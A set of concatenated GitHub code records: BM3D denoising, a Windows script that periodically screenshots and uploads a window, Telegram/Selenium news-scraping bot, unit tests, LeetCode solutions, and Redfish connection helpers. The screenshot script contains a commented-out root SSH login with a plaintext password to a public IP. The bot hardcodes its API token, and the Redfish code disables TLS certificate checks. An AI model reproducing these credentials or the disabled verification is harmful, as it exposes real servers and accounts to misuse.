[]\n for mutationDict in dictionary[\"mutations\"]:\n mutationList.append(MutationIdentifier.fromDict(mutationDict))\n return cls(\n dictionary[\"identifier\"],\n dictionary[\"common name\"],\n dictionary[\"location\"],\n dictionary[\"aliases\"],\n mutationList,\n dictionary[\"source\"],\n dictionary[\"notes\"]\n )\n\n @classmethod\n def fromJSON(cls, jsonString: str):\n dictionary = json.loads(jsonString)\n return cls.fromDict(dictionary)\n","repo_name":"Zymo-Research/VirSieveVEP","sub_path":"cvaSupport/viralVariantHandler.py","file_name":"viralVariantHandler.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18491177244","text":"import numpy as np\nfrom scipy import fftpack\n\ndef all_blocks(im, bsize):\n # Give an image of size H*W\n # return an array of size (H-bsize+1)*(W-bsize+1)*bsize*bsize\n # which are the blocks corresponding to their left-upper corners\n H, W = im.shape\n nb_y = H - bsize + 1\n nb_x = W - bsize + 1\n shifts = []\n for i in range(bsize):\n for j in range(bsize):\n shifts.append(im[i:i + nb_y, j:j + nb_x])\n blocks = np.stack(shifts, -1)\n blocks = np.reshape(blocks, [H - bsize + 1, W - bsize + 1, bsize, bsize])\n return blocks\n\n\ndef dct(arr, axes=None, inverse=False):\n if axes is None:\n axes = list(range(len(arr.shape)))\n if isinstance(axes, int):\n axes = [axes]\n for axis in axes:\n if inverse:\n arr = fftpack.idct(arr, axis=axis, norm='ortho')\n else:\n arr = fftpack.dct(arr, axis=axis, norm='ortho')\n return arr\n\n\ndef hard_thr(arr, thr):\n arr = arr.copy()\n arr[np.abs(arr) < thr] = 0.\n return arr\n\n\ndef block_dct(im, bsize, inverse=False):\n # Compute dct for all overlapping blocks in an image\n blocks = all_blocks(im, bsize)\n blocks = dct(blocks, axes=[2, 3], inverse=inverse)\n return blocks\n\n\ndef group(ref_block, neighborhood, thr, limit):\n # ref_block is bsize*bsize\n # neighborhood is nsize*nsize*bsize*bsize\n ref_block = ref_block[np.newaxis, np.newaxis, ...]\n d = np.mean(np.square(ref_block - neighborhood), axis=(2, 3))\n mask = d <= thr\n idx_y, idx_x = np.where(mask)\n grp = d[idx_y, idx_x]\n argsort = np.argsort(grp)\n argsort = argsort[:min(len(argsort), limit)]\n idx_x = idx_x[argsort]\n idx_y = idx_y[argsort]\n return idx_x, idx_y\n\n\ndef bm3d(im,\n sigma,\n N1_ht=8,\n N2_ht=16,\n Nstep_ht=6,\n N_S_ht=12,\n lambda2d=0,\n lambda3d=2.7,\n tau_match_ht=2500,\n N1_wie=8,\n N2_wie=16,\n Nstep_wie=6,\n N_S_wie=12,\n tau_match_wie=400):\n blocks_noisy = block_dct(im, bsize=N1_ht)\n bh, bw, _, _ = blocks_noisy.shape\n thr_im_dct = dct(im)\n thr_im_dct = hard_thr(thr_im_dct, lambda2d * sigma)\n thr_im = dct(thr_im_dct, inverse=True)\n blocks_thr = block_dct(thr_im, bsize=N1_ht)\n step1_agg = np.zeros_like(im)\n step1_weights = np.zeros_like(im)\n _ys = set() # debug\n for y in range(0, bh, Nstep_ht):\n for x in range(0, bw, Nstep_ht):\n ref = blocks_thr[y, x]\n Sy_min = max(0, y - N_S_ht)\n Sy_max = min(bh, y + N_S_ht + 1)\n Sx_min = max(0, x - N_S_ht)\n Sx_max = min(bw, x + N_S_ht + 1)\n neighborhood = blocks_thr[Sy_min:Sy_max, Sx_min:Sx_max]\n idx_x, idx_y = group(ref, neighborhood, tau_match_ht, N2_ht)\n grp = blocks_noisy[Sy_min:Sy_max, Sx_min:Sx_max][idx_y, idx_x]\n grp = dct(grp, axes=0)\n grp = hard_thr(grp, lambda3d * sigma)\n weights = np.square(sigma) * np.sum(grp > 0)\n if weights == 0:\n weights = 1.\n weights = 1. / weights\n grp = dct(grp, inverse=True)\n grp *= weights[np.newaxis, ...]\n idx_x = idx_x + Sx_min\n idx_y = idx_y + Sy_min\n for i in range(len(grp)):\n _ys.add((idx_y[i], idx_x[i])) # debug\n step1_agg[idx_y[i]:idx_y[i] + N1_ht, idx_x[i]:idx_x[i] + N1_ht] += grp[i]\n step1_weights[idx_y[i]:idx_y[i] + N1_ht, idx_x[i]:idx_x[i] + N1_ht] += weights\n basic_im = step1_agg / (step1_weights + 10e-8)\n\n blocks_noisy = block_dct(im, bsize=N1_wie)\n bh, bw, _, _ = blocks_noisy.shape\n blocks_basic = block_dct(basic_im, bsize=N1_wie)\n step2_agg = np.zeros_like(im)\n step2_weights = np.zeros_like(im)\n for y in range(0, bh, Nstep_wie):\n for x in range(0, bw, Nstep_wie):\n ref = blocks_basic[y, x]\n Sy_min = max(0, y - N_S_wie)\n Sy_max = min(bh, y + N_S_wie + 1)\n Sx_min = max(0, x - N_S_wie)\n Sx_max = min(bw, x + N_S_wie + 1)\n neighborhood = blocks_basic[Sy_min:Sy_max, Sx_min:Sx_max]\n idx_x, idx_y = group(ref, neighborhood, tau_match_wie, N2_wie)\n mask = np.zeros(neighborhood.shape[:2], dtype=np.bool)\n mask[idx_y, idx_x] = True\n grp_basic = neighborhood[mask]\n n_matched = len(grp_basic)\n grp_basic = grp_basic[:min(n_matched, N2_wie)]\n grp_basic = dct(grp_basic, axes=0)\n W_wie = np.square(grp_basic) / (np.square(grp_basic) + np.square(sigma))\n grp_noisy = blocks_noisy[Sy_min:Sy_max, Sx_min:Sx_max][mask]\n grp_noisy = grp_noisy[:min(n_matched, N2_wie)]\n grp_noisy = dct(grp_noisy, axes=0)\n grp_noisy *= W_wie\n weights = 1. / (np.square(sigma) * np.sum(np.square(W_wie)) + 10e-8)\n grp_noisy = dct(grp_noisy, inverse=True)\n grp_noisy *= weights\n xv = np.arange(Sx_min, Sx_max)\n yv = np.arange(Sy_min, Sy_max)\n xv, yv = np.meshgrid(xv, yv)\n xv = xv[mask]\n xv = xv[:min(n_matched, N2_wie)]\n yv = yv[mask]\n xv = xv[:min(n_matched, N2_wie)]\n for i in range(len(grp_noisy)):\n step2_agg[yv[i]:yv[i] + N1_wie, xv[i]:xv[i] + N1_wie] += grp_noisy[i]\n step2_weights[yv[i]:yv[i] + N1_wie, xv[i]:xv[i] + N1_wie] += weights\n final_im = step2_agg / (step2_weights + 10e-8)\n\n return final_im\n\n\n\n","repo_name":"BJTUSensor/AD-algorithm","sub_path":"bm3d.py","file_name":"bm3d.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"25697170758","text":"'''\nAuthor: y\nDate: 2022-07-12 19:34:38\nLastEditors: y\nLastEditTime: 2022-07-13 19:58:59\n'''\n# -*- coding: UTF-8 -*-\n\nimport datetime\nimport os\nimport paramiko\nimport requests\nimport threading\nimport time\nimport win32api\nimport win32con\nimport win32gui\nfrom PIL import ImageGrab\nfrom pathlib import Path\n\n\ndef match_windows(win_title):\n \"\"\"\n 查找指定窗口\n :param win_title: 窗口名称\n :return: 句柄列表\n \"\"\"\n\n hw = []\n def callback(hwnd, hwnds):\n if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):\n win_text = win32gui.GetWindowText(hwnd)\n # print(win_text)\n # 模糊匹配\n if win_text.find(win_title) > -1:\n hwnds.append(hwnd)\n # print(hwnds)\n\n return True\n\n win32gui.EnumWindows(callback, hw) # 列出所有顶级窗口,并传递它们的指针给callback函数\n return hw\n\n\n# 获取窗口信息\ndef get_window_pos(name):\n # name = name\n handle = match_windows(name)[0]\n print(handle)\n # handle = win32gui.FindWindow(0, name) # 类名,标题\n # 获取窗口句柄\n if handle == 0:\n return None\n else:\n # 返回坐标值和handle\n return win32gui.GetWindowRect(handle), handle\n\n\ndef func():\n # 获取坐标\n (x1, y1, x2, y2), handle = get_window_pos('Visual Studio Code')\n # print((x1, y1, x2, y2))\n # 发送还原最小化窗口的信息\n # win32gui.SendMessage(handle, win32con.WM_SYSCOMMAND, win32con.SC_RESTORE, 0)\n # 设为高亮\n # win32gui.SetForegroundWindow(handle)\n # 目录不存在,则创建截图存放的目录\n if Path(\"images\").is_dir() != 1:\n os.mkdir(\"images\")\n\n # 开始截图\n # using the grab method\n pic = ImageGrab.grab((x1, y1, x2, y2)) # 指定截取坐标(左边X,上边Y,右边X,下边Y)\n # pic = ImageGrab.grab(None)\n pic_name = time.strftime('%Y%m%d%H%M%S') + '.jpg'\n pic.mode = 'RGB'\n pic.save(\"images/\" + pic_name)\n # pic.show()\n print(\"show, now: \", datetime.datetime.now())\n\n # 通过sftp文件上传\n # ssh = paramiko.SSHClient()\n # ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n # ssh.connect(\"120.77.170.139\", 22, \"root\", \"Ss804806s\")\n # sftp = ssh.open_sftp()\n # sftp.put(pic_name, \"/www/wwwroot/images/\" + pic_name)\n # print(\"完成发送\")\n # os.remove(pic_name)\n # ssh.exec_command(\"python /www/wwwroot/ocr.py\") # 执行服务器上相应脚本\n\n # 模拟浏览器POST文件上传\n try:\n files = {'file': (pic_name, open(\"images/\" + pic_name, 'rb'), 'image/png')}\n data = {\n # \"computer\": 1\n }\n result = requests.post(url='http://127.0.0.1:5001/upload/img', data=data, files=files, headers={})\n print(result.text)\n os.remove(\"images/\" + pic_name)\n except:\n print('上传图片失败..')\n\n # 开始定时任务\n timer = threading.Timer(10, func, [])\n timer.start()\n\n\nfunc()\n","repo_name":"ForMachaca/timing-shot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19229108804","text":"import pytest\nfrom src.data_store import data_store\nfrom src.error import AccessError, InputError\nfrom src.auth import auth_register_v2\nfrom src.dm import dm_create_v1, dm_list_v1, dm_remove_v1, dm_leave_v1\nfrom src.other import clear_v1\nimport src.help as help\n\n# test token error\ndef test_token_error():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n dm_create_v1(token_1['token'], [])\n with pytest.raises(AccessError):\n dm_leave_v1(' ', 1)\n\n# test dmid error\ndef test_dmid_error():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n with pytest.raises(InputError):\n dm_leave_v1(token_1['token'], 1)\n\n# test auid not in dm\ndef test_auid_not_in_dm_error():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n token_2 = auth_register_v2(\n 'abcd@qq.com', '123123123123', 'bb', 'bb')\n\n dm_create_v1(token_1['token'], [])\n with pytest.raises(AccessError):\n dm_leave_v1(token_2['token'], 1)\n\n# test remove correct\ndef test_remove_correct():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n token_2 = auth_register_v2(\n 'abcd@qq.com', '123123123123', 'bb', 'bb')\n token_3 = auth_register_v2(\n 'abcdee@qq.com', '123123123123', 'cc', 'cc')\n token_4 = auth_register_v2(\n 'abcdeef@qq.com', '123123123123', 'dd', 'dd')\n token_5 = auth_register_v2(\n 'abcdeefg@qq.com', '123123123123', 'ee', 'ee')\n\n dm_create_v1(token_1['token'], [])\n dm_create_v1(token_2['token'], [1])\n dm_create_v1(token_3['token'], [1,2])\n dm_create_v1(token_4['token'], [1, 2, 3])\n dm_create_v1(token_5['token'], [1, 2, 3, 4])\n\n dm_leave_v1(token_1['token'], 1)\n dm_leave_v1(token_1['token'], 2)\n dm_leave_v1(token_1['token'], 3)\n dm_leave_v1(token_1['token'], 4)\n dm_leave_v1(token_1['token'], 5)\n\n re_list1 = dm_list_v1(token_1['token'])\n re_list2 = dm_list_v1(token_2['token'])\n re_list3 = dm_list_v1(token_3['token'])\n re_list4 = dm_list_v1(token_4['token'])\n re_list5 = dm_list_v1(token_5['token'])\n\n print(re_list1)\n print(re_list2)\n print(re_list3)\n print(re_list4)\n print(re_list5)\n\n assert re_list1 == {'dms': []}\n assert re_list2 == {'dms': [{'dm_id': 2, 'name': 'aaaa, bbbb'}, {'dm_id': 3, 'name': 'aaaa, bbbb, cccc'}, {'dm_id': 4, 'name': 'aaaa, bbbb, cccc, dddd'}, {'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n assert re_list3 == {'dms': [{'dm_id': 3, 'name': 'aaaa, bbbb, cccc'}, {'dm_id': 4, 'name': 'aaaa, bbbb, cccc, dddd'}, {'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n assert re_list4 == {'dms': [{'dm_id': 4, 'name': 'aaaa, bbbb, cccc, dddd'}, {'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n assert re_list5 == {'dms': [{'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n\n\n\n\n","repo_name":"FXGHH/COMP1531","sub_path":"tests/tests/dm_leave_v1_test.py","file_name":"dm_leave_v1_test.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41540974858","text":"from collections import defaultdict\nfrom lhc.interval import IntervalBinner\n\n\nclass IntervalMap(object):\n def __init__(self, key_value_pairs=None):\n self.len = 0\n self.binner = IntervalBinner()\n self.bins = defaultdict(list)\n self.values = defaultdict(list)\n\n if key_value_pairs is not None:\n for key, value in key_value_pairs:\n self[key] = value\n\n def __len__(self):\n return self.len\n\n def __iter__(self):\n for bin in self.bins.values():\n for item in bin:\n yield item\n\n def __contains__(self, item):\n bins = self.binner.get_overlapping_bins(item)\n for fr, to in bins:\n for bin in range(fr, to + 1):\n for set_interval in self.bins[bin]:\n if set_interval == item:\n return True\n return False\n\n def __setitem__(self, key, value):\n self.len += 1\n bin = self.binner.get_bin(key)\n self.bins[bin].append(key)\n self.values[bin].append(value)\n\n def __getitem__(self, item):\n bins = self.binner.get_overlapping_bins(item)\n for fr, to in bins:\n for bin in range(fr, to + 1):\n for i, set_interval in enumerate(self.bins[bin]):\n if set_interval.overlaps(item):\n yield self.values[bin][i]\n\n def iterkeys(self):\n for bin in self.bins.values():\n for item in bin:\n yield item\n\n def itervalues(self):\n for bin in self.values.values():\n for value in bin:\n yield value\n\n def iteritems(self):\n for keys, values in zip(iter(self.bins.items()), iter(self.values.items())):\n for key, value in zip(keys, values):\n yield key, value\n","repo_name":"EnjoyLifeFund/macHighSierra-py36-pkgs","sub_path":"lhc/collections/interval_map.py","file_name":"interval_map.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7512714269","text":"#библиотеки\nimport telebot\nfrom telebot import types\n#BeautifulSoup\nimport requests\nfrom bs4 import BeautifulSoup\n#Selenium\nfrom selenium.webdriver.common.keys import Keys #модуль ввода данных\nfrom selenium import webdriver #веб-драйвер\nfrom webdriver_manager.chrome import ChromeDriverManager #Chrome - браузер\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\n\n# подключим токен\nbot = telebot.TeleBot(\"2136961612:AAE-ybGpO5uVyj2nUlr7Fqy8plgUs7LFnzU\")\n\n# напишем, что делать нашему боту при команде старт\n@bot.message_handler(commands=['start'])\ndef send_keyboard(message, text=\"Хочешь узнать о новостях с главной страницы Финмаркета? Выбери интересующие тебя новости!\"):\n keyboard = types.ReplyKeyboardMarkup(row_width=2) # наша клавиатура\n itembtn1 = types.KeyboardButton('Главные новости (новость + ссылка)') # создадим кнопку\n itembtn2 = types.KeyboardButton('Поиск новостей по запросу (за текущий год)')\n itembtn3 = types.KeyboardButton('Российские фондовые индексы RTS/MOEX')\n itembtn4 = types.KeyboardButton(\"Курс евро за год\")\n itembtn5 = types.KeyboardButton('Курс доллара за год')\n itembtn6 = types.KeyboardButton('На сегодня пока всё.')\n keyboard.add(itembtn1, itembtn2) # добавим кнопки 1 и 2 на первый ряд\n keyboard.add(itembtn3, itembtn4, itembtn5, itembtn6)\n\n # пришлем это все сообщением и запишем выбранный вариант\n msg = bot.send_message(message.from_user.id,\n text=text, reply_markup=keyboard)\n\n # отправим этот вариант в функцию, которая его обработает\n bot.register_next_step_handler(msg, callback_worker)\n\n# парсинг новостей с главной страницы\ndef parcing_main():\n # формат ссылки страницы\n url = 'http://www.finmarket.ru/news/?nt=0&pg=1'\n # получим html код страницы\n response = requests.get(url)\n # html дерево\n tree = BeautifulSoup(response.content, 'html.parser')\n n = tree.find('div', {'class': \"center_column\"})\n # находим данные заголовок новости и дата\n news = n.find_all('div', {'class': \"title\"})\n dates = n.find_all('span', {'class': \"date\"})\n # список куда будем записывать данные\n parced_data = []\n # итерируемся по датам\n for i in range(len(dates)):\n # добавляем данные в наш список\n parced_data.extend({ news[i].text + '\\n' +\n 'http://www.finmarket.ru' + (news[i].a.get('href'))\n })\n parced_data_string = '\\n // \\n'.join(parced_data)\n print (parced_data)\n return (parced_data_string)\n\n#парсинг новостей по запросу (за прошедший год)\ndef parcing_search(msg):\n print(msg.text)\n a = msg.text\n bot.send_message(msg.chat.id, 'Запомнил ваш запрос, на него потребуется время, выполняю...')\n driver.get('http://www.finmarket.ru')\n sleep(1)\n selector = 'body > div.content > div.head_menu > div.top_menu_left > a.top_menu_txt.blue2'\n #element = find_element_by_css_selector(\"element_css_selector\")\n #element = driver.find_element(By.CSS_SELECTOR, \"element_css_selector\")\n #ss = driver.find_element_by_css_selector(selector)\n ss = driver.find_element(By.CSS_SELECTOR, selector)\n ss.click()\n sleep(1)\n selector = 'body > div.content > div.head_logo > div.socnet_box > a:nth-child(1)'\n ss = driver.find_element(By.CSS_SELECTOR, selector)\n ss.click()\n sleep(1)\n search = driver.find_element(By.CSS_SELECTOR,'body > div.content > div.main >' \\\n 'div.left_wide > div.center_column' \\\n '> div:nth-child(1) > div > form >' \\\n 'table:nth-child(1) > tbody > tr >' \\\n 'td:nth-child(2) > input')\n search.click()\n search_term = a\n search.send_keys(search_term)\n # находим кнопку с начальной датой\n date = driver.find_element(By.CSS_SELECTOR,'body > div.content > div.main >' \\\n 'div.left_wide > div.center_column >' \\\n 'div:nth-child(1) > div > form > table:nth-child(2) >' \\\n 'tbody > tr:nth-child(1) > td:nth-child(5) > table >' \\\n 'tbody > tr > td:nth-child(2) > input')\n # удаляем последнюю цифру даты в ячейке\n date.send_keys(Keys.BACK_SPACE)\n date.send_keys(Keys.NUMPAD0) # даты за 2020 годы нам хватит вполне, поэтому заменим дату начала с 2021 на 2020\n # нажимаем Показать, чтобы поиск новостей запустился\n show = driver.find_element(By.CSS_SELECTOR,'body > div.content > div.main > div.left_wide >' \\\n 'div.center_column > div:nth-child(1) > div > form >' \\\n 'table:nth-child(2) > tbody > tr:nth-child(2) > td >' \\\n 'input[type=image]:nth-child(1)')\n show.click()\n sleep(1)\n print(driver.current_url)\n url = driver.current_url\n # получим html код страницы\n response = requests.get(url)\n # html дерево\n tree = BeautifulSoup(response.content, 'html.parser')\n n = tree.find('div', {'class': \"center_column\"})\n # находим данные заголовок новости и дата\n news = n.find_all('div', {'class': \"title\"})\n dates = n.find_all('span', {'class': \"date\"})\n # список куда будем записывать данные\n parced_data = []\n # итерируемся по датам\n for i in range(len(dates)):\n # добавляем данные в наш список\n parced_data.extend({ news[i].text + '\\n' +\n 'http://www.finmarket.ru' + (news[i].a.get('href'))\n })\n parced_data_string = '\\n // \\n'.join(parced_data)\n print (parced_data)\n if parced_data_string == '':\n send_keyboard(msg, 'По вашему запросу ничего не найдено. Что нибудь еще?')\n else:\n send_keyboard(msg, parced_data_string)\n send_keyboard(msg, 'Прислал Вам новости по запросу. Что нибудь еще?')\n return (parced_data_string)\n\n# привязываем функции к кнопкам на клавиатуре\ndef callback_worker(call):\n\n # парсинг новостей с главной страницы\n if call.text == \"Главные новости (новость + ссылка)\":\n msg = bot.send_message(call.chat.id, 'Сейчас пришлю список главных новостей в чат...')\n try:\n msg2 = bot.send_message(call.chat.id, parcing_main())\n send_keyboard(call, 'Прислал Вам новости с главной страницы! Что нибудь еще?')\n except:\n send_keyboard(call, \"Возникла ошибка при парсинге данных. Что нибудь ещё?\")\n\n #парсинг новостей по запросу (за прошедший год)\n elif call.text == \"Поиск новостей по запросу (за текущий год)\":\n try:\n msg = bot.send_message(call.chat.id, 'Напишите запрос для поиска в чат. Выполню его менее чем за минуту...')\n bot.register_next_step_handler(msg, parcing_search)\n except:\n bot.send_message(call.chat.id, 'С Вашим запросом произошла ошибка. Попробуйте позже.')\n send_keyboard(call, \"Чем еще могу помочь?\")\n\n #курс доллара\n elif call.text == \"Курс доллара за год\":\n bot.send_message(call.chat.id, 'USD/RUB:')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/Charts/CurrencyDynamic.aspx?src=10148&ft=52148&per=2')\n send_keyboard(call, \"Курс выведен успешно. Что нибудь еще?\")\n\n #курс евро\n elif call.text == \"Курс евро за год\":\n bot.send_message(call.chat.id, 'EUR/RUB:')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/Charts/CurrencyDynamic.aspx?src=10148&ft=52170&per=2')\n send_keyboard(call, \"Курс выведен успешно. Что нибудь еще?\")\n\n #Российские фондовые индексы RTS/MOEX\n elif call.text == \"Российские фондовые индексы RTS/MOEX\":\n bot.send_message(call.chat.id, 'Динамика индекса RTS (по натуральному логарифму):')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/charts/IndicatorIndexes.aspx?sec=66&ft=3099')\n bot.send_message(call.chat.id, 'Динамика индекса ММВБ (по натуральному логарифму):')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/charts/IndicatorIndexes.aspx?sec=66&ft=6039')\n send_keyboard(call, \"Динамика индексов выведена. Что нибудь еще?\")\n\n #прощание\n elif call.text == \"На сегодня пока всё.\":\n bot.send_message(call.chat.id, 'До новых встреч! Если понадоблюсь - введите /start')\n\n@bot.message_handler(content_types=['text'])\ndef handle_docs_audio(message):\n send_keyboard(message, text=\"Пожалуйста, выберите один из пунктов меню:\")\n\n#непрерывная работа\nbot.polling(none_stop=True)\n\n","repo_name":"ivanmos96/Finmarket_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35537322643","text":"\"\"\"\nLeetCode-116\n\nGiven a binary tree\n\nTreeLinkNode {\n TreeLinkNode *left;\n TreeLinkNode *right;\n TreeLinkNode *next;\n}\n\nPopulate each next pointer to point to its next right node.\nIf there is no next right node, the next pointer should be set to NULL.\n\nInitially, all next pointers are set to NULL.\n\nNote:\n\nYou may only use constant extra space.\nRecursive approach is fine, implicit stack space does not count as extra space for this problem.\nYou may assume that it is a perfect binary tree (all leaves are at the same level, and every parent has two children).\n\nExample:\n\nGiven the following perfect binary tree,\n\n 1\n / \\\n 2 3\n / \\ / \\\n4 5 6 7\n\nAfter calling your function, the tree should look like:\n\n 1 -> NULL\n / \\\n 2 -> 3 -> NULL\n / \\ / \\\n4->5->6->7 -> NULL\n\"\"\"\n\n\nclass Solution:\n @staticmethod\n def connect(root):\n head = root\n while head:\n cur = head\n while cur:\n if cur.left:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n head = head.left\n return root\n","repo_name":"chinatsui/DimondDog","sub_path":"algorithm/exercise/binary_tree/populate_next_right_pointer_in_each_node.py","file_name":"populate_next_right_pointer_in_each_node.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"881291456","text":"#\n# @lc app=leetcode.cn id=160 lang=python3\n#\n# [160] 相交链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n map = dict()\n p = headA\n q = headB\n while(p != None or q!= None):\n if p:\n if p in map: return p\n else:\n map[p] = 0\n p = p.next\n if q:\n if q in map: return q\n else:\n map[q] = 0\n q = q.next\n return None\n \n# @lc code=end\n\n","repo_name":"PanXiebit/daliy_leetcode","sub_path":"leetcodes/160.相交链表.py","file_name":"160.相交链表.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6801975996","text":"import sys\nfrom schema import SchemaModel\nfrom collections import OrderedDict\n\n# map python 2 vs 3 imports\nif (sys.version_info < (3, 0)):\n # Python 2\n Python3 = False\n from urlparse import urlparse\n from urlparse import urljoin\n from StringIO import StringIO\n from httplib import HTTPSConnection, HTTPConnection, responses\n import urllib2\n from urllib import URLopener\n\nelse:\n # Python 3\n Python3 = True\n from urllib.parse import urlparse\n from urllib.parse import urljoin\n from io import StringIO, BytesIO\n from http.client import HTTPSConnection, HTTPConnection, responses\n import urllib.request\n from urllib.request import URLopener\n\nimport ssl\nimport json\nimport argparse\nimport base64\nimport warnings\nimport shutil\nfrom datetime import datetime\nimport gzip\nfrom xml.etree import ElementTree as ET\nimport os\nimport zipfile\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\n###################################################################################################\n# Name: service class \n# Description: \n# \n###################################################################################################\n\t \naccept_type = {\\\n 'json' : 'application/json',\\\n 'xml' : 'application/xml',\\\n 'bad' : 'snooop/dog' ,\\\n 'json_utf8' : 'application/json;charset=utf-8' ,\\\n 'xml_utf8' : 'application/xml;charset=utf-8'\n}\ncontent_type = {\\\n 'utf8' : 'application/json; charset=utf-8' ,\\\n 'json' : 'application/json',\\\n 'xml' : 'application/xml; charset=utf-8' \\\n}\n\n# some status codes referenced during test\nHTTP_OK = 200\nHTTP_UNAUTHORIZED = 401\nHTTP_NOT_FOUND = 404\nHTTP_CREATED = 201\nHTTP_ACCEPTED = 202\nHTTP_NO_CONTENT = 204\nHTTP_NOTIMPLEMENTED = 501\nHTTP_METHODNOTALLOWED = 405\nHTTP_BADREQUEST = 400\nHTTP_NOTMODIFIED = 304\nHTTP_MOVEDPERMANENTLY = 301\nHTTP_MOVEDTEMPORARILY = 307\nHTTP_MEDIATYPENOTSUPPORTED = 415\nHTTP_NOTACCEPTABLE = 406\n \ndefault_odata_version = '4.0'\n\n###############################################################################################\n# Name: Connect_Server_NoSSL \n# Description: \n# get an http(s) connection to a server (disabled SSL).\n# if successful return the connection else return 0.\n#\t \n###############################################################################################\ndef Connect_Server_NoSSL(sut_prop, host_ip_addr) :\n if not Python3:\n # Python 2\n if sys.version_info[0:3] >= (2, 7, 9):\n # Python 2.7.9 enables cert checks by default; disable it\n cont=ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n cont.verify_mode = ssl.CERT_NONE\n try:\n svr_conn = HTTPSConnection(host=host_ip_addr, strict=True, context=cont)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n else:\n # Python 2 but prior to 2.7.9\n try:\n svr_conn = HTTPSConnection(host=host_ip_addr, strict=True)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n else:\n # Python 3\n if sys.version_info[0:3] < (3, 4, 3):\n # Python 3 but prior to 3.4.3\n cont=ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n cont.verify_mode = ssl.CERT_NONE\n try:\n svr_conn = HTTPSConnection(host=host_ip_addr, context=cont)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n else:\n # Python 3.4.3 or later\n try:\n cntxt = ssl._create_unverified_context()\n except:\n exc_str = sys.exc_info()[0]\n cntxt = None # failure\n\n try:\n svr_conn = HTTPSConnection(host_ip_addr, context=cntxt)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n if (svr_conn == 0) :\n print(\"OPERATIONAL ERROR (%s) - Unable to connect to the Server %s -- exiting test...\" % (exc_str, sut_prop['DnsName']))\n print(\"Check the parameters configured for %s in the properties.json file\" % sut_prop['DisplayName'])\n ## game over.\n exit(0)\n\n return(svr_conn)\n#\n## end Connect Server No SSL\n\n###############################################################################################\n# Name: Connect_Server_NoSSL_NoHTTPS \n# Description: \n# get an http(s) connection to a server (disabled SSL).\n# if successful return the connection else return 0.\n#\t \n###############################################################################################\ndef Connect_Server_NoSSL_NoHTTPS(sut_prop, host_ip_addr) :\n\n try:\n svr_conn = HTTPConnection(host=host_ip_addr)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n if (svr_conn == 0) :\n print(\"OPERATIONAL ERROR (%s) - Unable to connect to the Server %s -- exiting test...\" % (exc_str, sut_prop['DnsName']))\n print(\"Check the parameters configured for %s in the properties.json file\" % sut_prop['DisplayName'])\n ## game over.\n exit(0)\n\n return(svr_conn)\n#\n## end Connect Server No SSL\n\n###############################################################################################\n# Name: http__set_auth_header() \n# Description: \n# common code for the http requests -- this function:\n# sets up the authorization header and centralizes code to ease\n# support accross python 2.x and 3.x\n# \n# Arguments:\n# rq_headers - dict() for the reqeust headers\n# login : login name\n# password : password\n#\n# Returns: \n###############################################################################################\ndef http__set_auth_header(rq_headers, login, password) :\n if (Python3 == True):\n bstr = login + \":\" + password\n bencode = base64.b64encode(bstr.encode(), altchars=None) \n rq_headers['Authorization'] = (\"Basic \" + bencode.decode())\n else: # python 2.x\n rq_headers['Authorization'] = (\"Basic \" + base64.b64encode(login + \":\" + password))\n \n#\n## end http__set_auth_header\n\n###############################################################################################\n# Name: get_auth_encoded \n# Description: \n# get authorization string encoded -- this function:\n# returns the encoded authorization for request header\n# supports accross python 2.x and 3.x\n# \n# 